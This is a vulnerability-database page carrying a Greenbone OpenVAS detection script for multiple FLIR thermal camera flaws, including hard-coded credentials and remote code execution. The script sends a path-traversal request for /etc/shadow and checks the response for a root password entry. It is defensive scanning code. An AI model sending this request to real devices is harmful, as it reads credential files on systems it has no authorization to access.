FLIR Systems Cameras Multiple Vulnerabilities
🗓️ 26 Sep 2017 00:00:00Reported by Copyright (C) 2017 Greenbone AGType
openvas🔗 plugins.openvas.org👁 16 Views
| Reporter | Title | Published | Views | Family All 47 |
|---|---|---|---|---|
| CVE-2017-20212 | 7 Jan 202623:26 | – | circl | |
| CVE-2017-20213 | 7 Jan 202623:26 | – | circl | |
| CVE-2017-20214 | 7 Jan 202623:26 | – | circl | |
| CVE-2017-20215 | 7 Jan 202623:26 | – | circl | |
| CVE-2017-20216 | 7 Jan 202623:26 | – | circl | |
| FLIR Thermal Camera FC Series和FLIR Thermal Camera PT Series 操作系统命令注入漏洞 | 8 Jan 202600:00 | – | cnnvd | |
| FLIR Thermal Camera 操作系统命令注入漏洞 | 8 Jan 202600:00 | – | cnnvd | |
| FLIR Thermal Camera 信任管理问题漏洞 | 8 Jan 202600:00 | – | cnnvd | |
| FLIR Thermal Camera 访问控制错误漏洞 | 8 Jan 202600:00 | – | cnnvd | |
| FLIR Thermal Camera 路径遍历漏洞 | 8 Jan 202600:00 | – | cnnvd |
10
| Source | Link |
|---|---|
| exploit-db | www.exploit-db.com/exploits/42786/ |
| exploit-db | www.exploit-db.com/exploits/42787/ |
| exploit-db | www.exploit-db.com/exploits/42788/ |
| web | www.web.archive.org/web/20171011125811/https://www.flir.com/security/blog/details/ |
| exploit-db | www.exploit-db.com/exploits/42789/ |
| exploit-db | www.exploit-db.com/exploits/42785/ |
# SPDX-FileCopyrightText: 2017 Greenbone AG
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-only
CPE = "cpe:/a:flir_systems:camera";
if (description)
{
script_oid("1.3.6.1.4.1.25623.1.0.140401");
script_version("2026-01-15T05:47:46+0000");
script_tag(name:"last_modification", value:"2026-01-15 05:47:46 +0000 (Thu, 15 Jan 2026)");
script_tag(name:"creation_date", value:"2017-09-26 16:38:33 +0700 (Tue, 26 Sep 2017)");
script_tag(name:"cvss_base", value:"10.0");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:C/I:C/A:C");
script_tag(name:"severity_vector", value:"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
script_tag(name:"severity_origin", value:"NVD");
script_tag(name:"severity_date", value:"2026-01-08 00:15:56 +0000 (Thu, 08 Jan 2026)");
script_cve_id("CVE-2017-20212", "CVE-2017-20213", "CVE-2017-20214", "CVE-2017-20215",
"CVE-2017-20216");
script_tag(name:"qod_type", value:"exploit");
script_tag(name:"solution_type", value:"WillNotFix");
script_name("FLIR Systems Cameras Multiple Vulnerabilities");
script_category(ACT_ATTACK);
script_copyright("Copyright (C) 2017 Greenbone AG");
script_family("Web application abuses");
script_dependencies("gb_flir_systems_detect.nasl");
script_mandatory_keys("flir_camera/detected");
script_tag(name:"summary", value:"FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID,
PT-Series are prone to multiple vulnerabilities.");
script_tag(name:"insight", value:"FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID,
PT-Series are prone to multiple vulnerabilities:
- CVE-2017-20212: Information disclosure
- CVE-2017-20213: Stream disclosure
- CVE-2017-20214: Hard-coded Credentials
- CVE-2017-20215: Authenticated Remote Code Execution
- CVE-2017-20216: Unauthenticated Remote Code Execution");
script_tag(name:"impact", value:"Successful exploitation of these vulnerabilities could lead to
information disclosure, or remote code execution.");
script_tag(name:"affected", value:"FLIR Systems FLIR Thermal/Infrared Camera FC-Series S, FC-Series ID,
PT-Series version 8.0.0.64.");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the
disclosure of this vulnerability. Likely none will be provided anymore. General solution options are to
upgrade to a newer release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"vuldetect", value:"Sends a crafted HTTP GET request and checks the response.");
script_xref(name:"URL", value:"https://web.archive.org/web/20171011125811/https://www.flir.com/security/blog/details/?ID=87043");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/42786/");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/42789/");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/42787/");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/42788/");
script_xref(name:"URL", value:"https://www.exploit-db.com/exploits/42785/");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
if (!port = get_app_port(cpe: CPE))
exit(0);
if (!get_app_location(cpe: CPE, port: port, nofork: TRUE))
exit(0);
url = "/api/xml?file=/etc/shadow";
if (http_vuln_check(port: port, url: url, pattern: "root:.*:0:", check_header: TRUE)) {
report = http_report_vuln_url(port: port, url: url);
security_message(port: port, data: report);
exit(0);
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Jan 2026 00:00Current
7.8High risk
Vulners AI Score7.8
CVSS 3.19.8
CVSS 49.3
EPSS0.14231
SSVC